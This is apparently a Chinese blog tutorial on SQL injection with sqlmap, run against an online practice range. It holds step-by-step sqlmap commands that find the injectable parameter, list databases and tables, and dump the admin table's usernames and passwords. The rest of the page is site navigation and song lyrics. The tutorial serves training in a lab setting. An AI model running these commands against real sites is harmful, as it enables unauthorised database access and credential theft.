【Mac渗透测试】之SQL注入Demo

 

目录:

  一、下载安装sqlmap

  二、SQL注入

  三、参考文章

   

 

一、下载安装sqlmap

 

1、官网地址:http://sqlmap.org/#download

git下载:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

 

2、验证sqlmap安装成功:

sqlmap.py -v

 

 

二、SQL注入

1、首先网上找到了SQL 注入靶场:http://59.63.200.79:8003/?id=1

复制代码
# 基础语法

sqlmap.py -u “注入地址”   --dbs   # 列举数据库
sqlmap.py -u “注入地址”   --current--db   # 当前数据库
sqlmap.py -u “注入地址”   --users    # 列数据库用户
sqlmap.py -u “注入地址”   --current--user  # 当前用户
sqlmap.py -u “注入地址”   --tables -D “数据库”   # 列举数据库的表名
sqlmap.py -u “注入地址”  --columns -T “表名” -D “数据库”   # 获取表的列名
sqlmap.py -u “注入地址”  --dump -C “列名字” -T “表名字”  -D “数据库”    # 获取数据库下表的列信息
复制代码

2、查看是否可以SQL注入:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch   

 

 

3、查看数据库:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs   

 

 4、查看当前使用的数据库:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --current-db

 

 5、查看当前数据库的表:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables 

 

 6、查看admin表的sql字段列:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns

 

 7、查看maoshe数据库、admin表的“password,username”字段的值:

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --dump -C "password,username" -T admin -D maoshe

 三、参考文章  返回目录

1、感谢海龙。 的文章《SQLMap的安装与使用*****

2、感谢Agan '的文章《SQL注入篇:SQL 注入靶场练习【实例1】*****

3、感谢simeon的文章《超详细SQLMap使用攻略及技巧分享 ****

4、感谢的文章《零基础学习手工SQL注入(墨者学院靶场)

5、感谢迷途行者 的文章《第一次靶场练习:SQL注入(1)

 

posted @   Owen_ET  阅读(791)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
  1. 1 イエスタデイ(翻自 Official髭男dism) 茶泡饭,春茶,kobasolo
  2. 2 模様 (TV size ver.) Ivy to Fraudulent Game
  3. 3 河口恭吾
  4. 4 愛してる 高鈴
  5. 5 一生所爱 卢冠廷,莫文蔚
  6. 6 世间美好与你环环相扣 柏松
  7. 7 理想三旬 陈鸿宇
  8. 8 不浪漫罪名 王杰
  9. 9 樱花树下 张敬轩
  10. 10 因为你在 达闻西乐队,福禄寿FloruitShow
  11. 11 悬溺 葛东琪
因为你在 - 达闻西乐队,福禄寿FloruitShow
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.

因为你在 - 达闻西乐队/福禄寿FloruitShow

词:猴子

曲:猴子

制作人:吴涛

编曲:达闻西乐队/福禄寿FloruitShow

主唱:合成器

合声:猴子/福禄寿FloruitShow

吉他:猴子/老黑

贝斯:大鹏

鼓:小盛

缩混/母带:吴涛

录音棚:每个人自己家

曾有一瞬间

恐惧环绕身边

因为有你在

让我更勇敢

曾有一瞬间

泪水擦过我的脸

你飞奔而来

触摸我指尖

这个冬天

使命在召唤

时间停滞

期待的双眼

回头的瞬间

为什么感觉

其实我不孤单

原来是 你啊

还有你啊

背负着一样的痛

大家一起啊

快一起啊

拥抱着同样的梦

绝不能轻易说放弃

因为你在

因为你在

所有的爱

凝聚成力量

所有的语言

连接着心跳

直到明天

和你一起分享

胜利的喜悦

我才能心安

每当我醒来

空气清新温暖

谁起的灯火

谁打开的窗

每当我转身

耀眼的光芒

是谁点燃希望

原来是 你啊

还有你啊

背负着一样的痛

大家一起啊

快一起啊

拥抱着同样的梦

我想和你啊

想和你啊

手牵着手一起出发

我要和你啊

要和你啊

手牵着手一起回家

因为有你在

因为有你在

黑夜不再寒冷

我变的更勇敢

因为有你在

因为有你在

爱凝聚成希望

传递给我力量

因为有你在

因为有你在

黑夜不再寒冷

我变的更勇敢

因为有你在

因为有你在

爱凝聚成希望

传递给我力量

因为有你在

因为有你在

黑夜不再寒冷

我变的更勇敢

因为有你在

因为有你在

爱凝聚成希望

传递给我力量

爱永远不会消失

因为你在

因为你在

点击右上角即可分享
微信分享提示